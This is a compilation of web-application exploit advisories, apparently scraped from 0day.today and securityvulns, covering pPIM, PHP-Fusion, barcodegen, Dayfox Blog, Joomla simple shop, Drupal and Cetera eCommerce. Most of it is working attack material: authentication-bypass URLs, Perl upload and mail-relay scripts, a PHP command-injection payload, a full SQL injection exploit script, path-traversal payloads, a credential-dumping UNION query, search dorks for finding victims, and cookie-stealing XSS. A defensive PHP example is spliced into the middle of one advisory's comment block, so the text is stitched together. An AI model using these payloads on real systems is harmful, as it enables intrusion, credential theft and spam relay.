Depending on the hashing algorithm used by PHP this\r\ncould be trivially easy to compromise using a password cracking tool\r\nlike John the Ripper.\r\n\r\nUnauthenticated Password Change:\r\n\r\nThere is no authentication protection on the password changing script,\r\nso calling\r\n\r\nhttp://target.tld/ppim/changepassword.php\r\n\r\nwill present an attacker with the password change script and allow\r\npassword reset without confirming the existing password.\r\n\r\nMultiple Authentication Problems:\r\n\r\nBecause the authentication takes place in templates/header.html in an\r\nembedded piece of PHP code, depending on server configuration, this code\r\nmight not be executed. Unless the web server is specifically configured\r\nto execute PHP embeded in HTML files server site the PHP code will\r\ninstead simply be passed back to clients as actual HTML.\r\n\r\nAuthentication bypass is possible by simply appending the GET variable\r\n'login=1' to the URL. For example, to access the Calendar page, calling\r\nthe URL 'http://target.tld/ppim/calendar.php' will redirect the\r\nunauthenticated user to the login page. However, calling the URL\r\n'http://target.tld/ppim/calendar.php?login=1' will allow unauthenticated\r\naccess to the Calendar. Any of the pages in pPIM can be accessed this way.\r\n\r\nArbitrary File Upload\r\n\r\npPIM's upload.php script allows attackers to upload arbitrary scripts of\r\nany type to the target server. To do this using Perl simply create the\r\nfile and upload it using Perl:\r\n\r\n$ echo \"<?php echo phpinfo();?>\" > phpinfo.php\r\n\r\nThe execute the following Perl script:\r\n\r\n#!/usr/bin/perl\r\n#\r\n# pPIM Uploader by Justin C. 
Klein Keane <[email\u00a0protected]>\r\n# Used to upload the file phpinfo.php to a target pPIM site\r\n# bypassing authentication.\r\n#\r\n# Feb 24, 2009\r\n#\r\nuse LWP::UserAgent;\r\nuse HTTP::Request::Common qw(POST);\r\n\r\n$ua = LWP::UserAgent->new();\r\n$request = HTTP::Request->new();\r\n\r\n$response = $ua->request( POST 'http://target.tld/ppim/upload.php?login=1',\r\n Content_Type => 'form-data',\r\n Content =>\r\n [\r\n 'submitupload' => 'submitupload',\r\n 'userfile' => ['./info.php']\r\n ],\r\n);\r\ndie \"Error: \", $response->status_line unless $response->is_success;\r\n\r\nUnauthorized Email Relay\r\n\r\npPIM's sendmail.php script has absolutely no authentication or\r\nvalidation, allowing anyone with access to the site to relay e-mail.\r\nThe following Perl script will relay email through the pPIM installation:\r\n\r\n#!/usr/bin/perl\r\n#\r\n# pPIM Mailer by Justin C. Klein Keane <[email\u00a0protected]>\r\n# Used to relay mail through any pPIM installation\r\n#\r\n# Feb 24, 2009\r\n#\r\nuse LWP::UserAgent;\r\nuse HTTP::Request::Common qw(POST);\r\n\r\n$ua = LWP::UserAgent->new();\r\n$request = HTTP::Request->new();\r\n\r\n$response = $ua->request( POST 'http://target.tld/ppim/sendmail.php',\r\n Content_Type => 'form-data',\r\n Content =>\r\n [\r\n 'submitemail' => 'submitemail',\r\n 'to' => '[email\u00a0protected]',\r\n 'from' => '[email\u00a0protected]',\r\n 'message' => 'You are just asking for spam!'\r\n ],\r\n);\r\ndie \"Error: \", $response->status_line unless $response->is_success;\r\n\r\nPosting Unauthenticated Notes\r\n\r\nThe notes.php script fails to check authentication before inserting new\r\nnotes. This allows attackers to post notes without even having to\r\nbypass authentication. Similarly no authentication is required to\r\ndelete notes, allowing unauthenticated attackers to clear all stored notes.\r\n\r\nXSS Vulnerability\r\n\r\nNone of the form fields seem to be adequately scrubbed to prevent Cross\r\nSite Scripting (XSS). 
This vulnerability is endemic throughout the\r\napplication. For instance, creating a note with the title\r\n\"<script>alert('foo');</script>\" causes a JavaScript alert box to pop up\r\nthe word \"foo\" whenever the Notes screen is accessed.\r\n\r\nSystem Credential Exposure\r\n\r\nBecause the Email function stores mailbox information as a flat file it\r\nis easy to disclose system account information. For instance, in pPIM,\r\nif I were to create a new mailbox for root a file called \"root.email\"\r\nwould be created in the email folder. By calling the URL\r\nhttp://target.tld/ppim/email/root.email the following output is exposed\r\nvia web browser:\r\n\r\n<?php\r\n$mailserver = \"localhost\";\r\n$username = \"root\";\r\n$password = \"root_password\";\r\n?>\r\n\r\nThus an attacker that can enumerate (or guess) user accounts for\r\nmailboxes set up via pPIM can easily disclose server location as well as\r\nusernames and passwords. This vulnerability affects all data stored in\r\npPIM - it can be accessed directly via URL call without any form of\r\nauthentication and will expose any material stored in pPIM to users\r\nwithout authentication.\r\n\r\nArbitrary Command Execution\r\n\r\nBy creating a specially crafted link an attacker can run arbitrary\r\ncommands with the privileges of the web server process. By altering the\r\nURL field of a link the data files created can be manipulated. Under\r\nnormal usage a user can create a new link under a group, say the\r\n'test_group' with the name 'testlink', the URL '192.168.0.1' and the\r\ndescription 'test description'. 
This file is then stored in pPIM's root\r\ndirectory under the links/test_group/ directory as testlink.link.\r\nViewing this file we see:\r\n\r\n$ cat testlink.link\r\n<?php\r\n$url=\"192.168.0.52\";\r\n$name=\"test link\";\r\n$description=\"This is the test link\";\r\n?>\r\n\r\nThis file is included as a PHP include when the note is rendered.\r\nRudimentary JavaScript provides client side validation of input data,\r\nbut if an attacker arbitrarily submitted a form with the following data:\r\n\r\nlinkname=evil_link&linkurl=\";$url=system('cat\r\n/etc/passwd');$foo=\"&linkdescription=test2&groupname=test+group&linksubmit=Make+Link\r\n\r\nThe URL variable is overwritten with injected definition. Looking at\r\nthe evil_link.link file created on the filesystem we see:\r\n\r\n$ cat evil_link.link\r\n<?php\r\n$url=\"\";$url=system('cat /etc/passwd');$foo=\"\";\r\n$name=\"evil_link\";\r\n$description=\"test2\";\r\n?>\r\n\r\nThus we have arbitrarily overwritten the $url variable and assigned it\r\nthe value that returns from the output of our system call. 
In fact, now when a user viewed the Links page they could read the /etc/passwd file via a web browser.

Conclusions:

I stopped poking at pPIM after gleaning these details, as it became abundantly clear that the application is thoroughly riddled with holes. pPIM fails to enforce any security in its code, and deploying the application produces a gaping hole in the security of any host.

Recommendations:

Uninstall pPIM immediately!

# 0day.today [2018-04-08] #


PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
2008-11-20T00:00:00
ID 1337DAY-ID-4215 Type zdt Modified 2008-11-20T00:00:00
Description
Exploit for unknown platform in category web applications
Source: https://0day.today/exploit/4215

<?php
/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
 PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
 requires magic_quotes == off

 coded by irk4z
 homepage: http://irk4z.wordpress.com

 greets: all friends ;)
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/

$host = $argv[1];
$path = $argv[2];
$login = $argv[3];
$pass = $argv[4];
$sql_injection = $argv[5];

echo
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n".
" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n".
" requires magic_quotes == off\n".
"\n".
" coded by irk4z[at]yahoo.pl\n".
" homepage: http://irk4z.wordpress.com\n".
"\n".
" greets: all friends ;)\n".
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n";

if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){
	echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" .
		 " php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n".
		 " php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n";
	die;
}

echo "Logging into system...";
//login to php-fusion using login and pass
$login_data = send($host, array(	"path" => $path."news.php",
					"post" => array(
							"user_name" => $login,
							"user_pass" => $pass,
							"login" => "Login"
							)
				)
			);

//get cookies (the fusion_user cookie has the form "<id>.<32-char hash>")
preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches);
$cookies = implode(' ', $matches[1]);

//get user id (the group captures the whole number, not only its last digit)
preg_match_all("/([0-9]+).([a-zA-Z0-9]{32})/", $cookies, $matches);
$my_id = $matches[1][0];

if(empty($my_id)){
	echo "\n[x] Incorrect login or password..";
	die;
} else {
	echo "[ok]\n";
}

//random marker; its hex form is wrapped around the query result so it can be found in the HTML later
$id_message = uniqid();
$inhex = '';
for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;

echo "Running sql-injection...\n";
//running sql-injection: msg_send closes the quote and opens a comment, subject closes the comment
//and supplies the remaining INSERT values, one of them a subselect carrying the hex-encoded result
$res = send($host, array(	"path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&",
				"cookie" => $cookies,
				"post" => array(
						"send_message" => 'X',
						"subject" => "X*/,0x{$inhex},(SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*",
						"message" => "XXX"
						)
			)
		);

echo "Getting data...\n\n";
//the injected row lands in our own outbox; find its message id by the marker in the subject
$res = send($host, array(	"path" => $path."messages.php?folder=outbox",
				"cookie" => $cookies )
			);

preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches);
$id_message_number = $matches[1][0];

$res = send($host, array(	"path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number,
				"cookie" => $cookies )
		);

preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches);

if( empty($matches[1][0]) ){
	echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n";
} else {
	$tmp = '';
	$hex = $matches[1][0];
	//unhex it!
	for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));
	echo "DATA: \n".$tmp."\n\n";
}

echo "Deleting message...\n";

$res = send($host, array(	"path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number,
				"cookie" => $cookies,
				"post" => array (
						"delete" => "Delete"
						)
			)
		);

//send http packet (raw socket; POST values are sent as given, without urlencoding)
function send($host, $dane = "") {
	$ret = "";
	$packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n";
	$packet .= "Host: {$host}\r\n";

	if( !empty($dane['cookie']) ){
		$packet .= "Cookie: {$dane['cookie']}\r\n";
	}

	if( !empty($dane['post']) ){
		$reszta_syfu = "";
		foreach($dane['post'] as $tmp => $tmp2){
			$reszta_syfu .= $tmp . "=" . $tmp2 . "&";
		}
		$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
		$packet .= "Connection: Close\r\n";
		$packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n";
		$packet .= $reszta_syfu;
	} else {
		$packet .= "Connection: Close\r\n\r\n";
	}

	$o = @fsockopen($host, 80);
	if(!$o){
		echo "\n[x] No response...\n";
		die;
	}
	fputs($o, $packet);
	while (!feof($o)) $ret .= fread($o, 1024);
	fclose($o);
	return ($ret);
}

?>


barcodegen <= 2.0.0 Local File Inclusion Vulnerability
2008-09-24T00:00:00
ID 1337DAY-ID-3748 Type zdt Modified 2008-09-24T00:00:00
Description
Exploit for unknown platform in category web applications
Source: https://0day.today/exploit/3748
 [ Discovered by dun ]

 ###################################################################
 # [ barcodegen <= 2.0.0 ] Local File Inclusion Vulnerability #
 ###################################################################
 #
 # Script: "Barcode Generator 1D"
 #
 # Script site: http://www.barcodephp.com/
 # Download: http://www.barcodephp.com/download.php
 #
 # Vuln:
 # http://site.com/[barcodegen.1d-v2.0.0]/html/image.php?t=1&r=1&text=1&f1=1&f2=1&o=1&a1=1&a2=1&code=/../../../../../../../etc/passwd%00
 #
 # The trailing %00 is a NUL byte: on PHP releases before 5.3.4 it truncates the path inside
 # include(), so the '.barcode.php' suffix appended below never takes effect and any file the
 # web server can read is included.
 #
 # Bug: ./barcodegen.1d-v2.0.0/html/image.php (lines: 2-8)
 #
 # ...
 # if(isset($_GET['code']) && isset($_GET['t']) && isset($_GET['r']) && isset($_GET['text']) && isset($_GET['f1'])
 # && isset($_GET['f2']) && isset($_GET['o']) && isset($_GET['a1']) && isset($_GET['a2'])) {
 #	require('config.php');
 #	require($class_dir.'/BCGColor.php');
 #	require($class_dir.'/BCGBarcode.php');
 #	require($class_dir.'/BCGDrawing.php');
 #	require($class_dir.'/BCGFont.php');
 #	if(include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')) {	// LFI
 # ...
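The include() in image.php above, and the three include() calls in the Dayfox Blog entry that follows, share one defect: a request parameter is concatenated into a filesystem path and the only check is whether the result exists. The following PHP is an added example, not code from barcodegen, Dayfox Blog or their authors. It shows the replacement a reviewer would ask for: an allowlist on the identifier, canonicalisation with realpath(), and a containment check against the base directory. The function name safe_include_path(), the temporary directory layout, the symlink case and the sample inputs are assumptions made for the demonstration.

```php
<?php
// Added example (not barcodegen's or Dayfox Blog's own code): a safe way to derive an
// include path from a request parameter. Directory names, the helper name and the sample
// inputs are assumptions chosen for illustration.

/**
 * Resolve $name to a file inside $baseDir, or return null if the request must be refused.
 * The vulnerable code in both advisories takes the raw parameter; this does three things
 * instead:
 *   1. rejects anything but a plain identifier, so "../", "/" and NUL never reach the path
 *      (strip_tags()/htmlspecialchars(), as used by Dayfox, leave all of those untouched);
 *   2. resolves the candidate with realpath(), which canonicalises "." and symlinks and
 *      returns false for a file that does not exist;
 *   3. confirms the canonical file still sits under the canonical base directory.
 */
function safe_include_path(string $baseDir, string $prefix, string $name, string $suffix): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;                                   // step 1: allowlist
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $prefix . $name . $suffix);
    if ($candidate === false) {
        return null;                                   // step 2: must exist after canonicalisation
    }
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                                   // step 3: containment
    }
    return $candidate;
}

// Self-check against a constructed sample tree in a temp dir (no barcodegen install needed).
$tmp = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir("$tmp/class", 0700, true);
file_put_contents("$tmp/class/BCGcode39.barcode.php", "<?php\n// sample barcode class\n");
file_put_contents("$tmp/secret.txt", "not for you\n");
// A symlink inside the class dir pointing outside it: passes the allowlist, must still be refused.
@symlink("$tmp/secret.txt", "$tmp/class/BCGlink.barcode.php");

$tests = [
    'code39'                               => true,   // legitimate request
    "/../../../../../../../etc/passwd\0"   => false,  // the barcodegen PoC, %00 decoded
    '../../secret'                         => false,  // traversal inside the app tree
    'code39/../code39'                     => false,  // slash is not in the allowlist
    'code128'                              => false,  // well-formed name, file does not exist
    'link'                                 => false,  // symlink escaping the base directory
    ''                                     => false,  // empty identifier
];
$allOk = true;
foreach ($tests as $name => $expectAllowed) {
    $path = safe_include_path("$tmp/class", 'BCG', $name, '.barcode.php');
    $allowed = ($path !== null);
    $allOk = $allOk && ($allowed === $expectAllowed);
    printf("%-42s %s\n", json_encode($name), $allowed === $expectAllowed ? 'OK' : 'MISMATCH');
}
// Only at this point would the application do:  if ($path !== null) { include $path; }

@unlink("$tmp/class/BCGlink.barcode.php");
unlink("$tmp/class/BCGcode39.barcode.php");
unlink("$tmp/secret.txt");
rmdir("$tmp/class");
rmdir($tmp);
echo $allOk ? "all checks behaved as expected\n" : "unexpected result, see above\n";
```

The allowlist alone already stops every payload in these two advisories; the realpath() and containment steps are there for the cases an allowlist does not see, such as a symlink or a later change that widens the accepted characters. On PHP 8 a NUL byte in the argument makes realpath() throw a ValueError, which is one more reason to reject it before the filesystem call rather than rely on the filesystem to refuse it.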
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ]


Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities
2008-08-04T00:00:00
ID 1337DAY-ID-3504 Type zdt Modified 2008-08-04T00:00:00
Description
Exploit for unknown platform in category web applications
Source: https://0day.today/exploit/3504

--------
Discovered By: Virangar Security Team (hadihadi)

special tnx to: MR.nosrati, black.shadowes, MR.hesy, Ali007, Zahra

& all virangar members & all iranian hackerz

greetz: to my best friend in the world hadi_aryaie2004
& my lovely friend arash (imm02tal) from ISCN
-----------------------------------
Download: http://www.dayfoxdesigns.co.nr
Dork: Powered by Dayfox Designs This is a port of WordPress
-------------------------------------------------------------------------------------------------
vuln codes in index.php:
############line 140-144##################
if (isset($_GET["cat"])) {
 $page = 'entries/'.strip_tags(htmlspecialchars($_GET["cat"])).'.txt';
 if (file_exists($page)) {
 echo "<br /><a href=\"javascript: history.go(-1)\">< Back</a>";
 @include ("$page");
############line 173-178###################
if (isset($_GET["p"])) {
 $page = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'.txt';
 $pagecomments = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'comments.txt';
 if (file_exists($page)) {
 echo '<br /><a href="javascript: history.go(-1)">< Back</a>';
 include ("$page");
############line 209-213##################
if (isset($_GET["archive"])) {
 $page = 'entries/'.strip_tags(htmlspecialchars($_GET["archive"])).'.txt';
 if (file_exists($page)) {
 echo '<br /><a href="javascript: history.go(-1)">< Back</a>';
 include ("$page");
----------------------------------------------------------------------------------------------------

strip_tags() and htmlspecialchars() only neutralise HTML markup; they leave "../" and the %00 terminator untouched, so the appended ".txt" is cut off by the NUL byte (both in file_exists() and in include() on the PHP versions of the time) and any file readable by the web server is included.

exploit:
http://site.com/index.php?p=../../../../../../../etc/passwd%00
http://site.com/index.php?cat=../../../../../../../etc/passwd%00
http://site.com/index.php?archive=../../../../../../../etc/passwd%00
--------
young iranian h4ck3rz


Joomla Component simple shop 2.0 SQL Injection Vulnerability
2008-02-23T00:00:00
ID 1337DAY-ID-2687 Type zdt Modified 2008-02-23T00:00:00
Description
Exploit for unknown platform in category web applications
Source: https://0day.today/exploit/2687

###############################################################
#
# joomla com_simpleshop SQL Injection (section)
#
################################################################
#
# DORK 1 : allinurl:"com_simpleshop"
#
# DORK 2 : allinurl:"com_simpleshop" section
#
################################################################
EXPLOIT :

index.php?option=com_simpleshop&[email protected]&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*

(The parameter shown as "[email protected]" was mangled by e-mail obfuscation in the source and cannot be recovered from this page. The UNION supplies six columns, so it must match the column count of the original section query; the two concat() columns carry username:password pairs from jos_users into the rendered page.)


Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector
2007-10-10T00:00:00
ID 1337DAY-ID-2213 Type zdt Modified 2007-10-10T00:00:00
Description
Exploit for unknown platform in category web applications
Source: https://0day.today/exploit/2213

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();


XSS, SQL Injection and SQL DB Structure Extraction vulnerabilities in Cetera eCommerce
2011-03-29T00:00:00
ID SECURITYVULNS:DOC:26008 Type securityvulns Modified 2011-03-29T00:00:00
Source: https://vulners.com/securityvulns/SECURITYVULNS:DOC:26008

Hello 3APA3A!

I am reporting new Cross-Site Scripting, SQL Injection and SQL DB Structure Extraction vulnerabilities that I found in Cetera eCommerce.

XSS (WASC-08) (these also work in version 15.0):

http://site/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

http://site/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

XSS (WASC-08):

http://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

This vulnerability appeared in version 15.0. It is located on the 404 error page, so it triggers both at this address and at any other address that leads to a non-existent page.

SQL Injection (WASC-19):

http://site/catalog/(version()=5.1)/

http://site/catalog/cart/'+benchmark(100000,md5(now()))+'/

SQL DB Structure Extraction (WASC-13):

http://site/catalog/%22/

http://site/catalog/cart/'/

Cetera eCommerce 14.0 and earlier versions are vulnerable, and the XSS vulnerabilities also affect version 15.0. The last four vulnerabilities have already been fixed in Cetera eCommerce 15.0 (released in October 2010).

More information about these vulnerabilities is on my site:
http://websecurity.com.ua/4883/

Best wishes & regards,
MustLive
Site administrator
http://websecurity.com.ua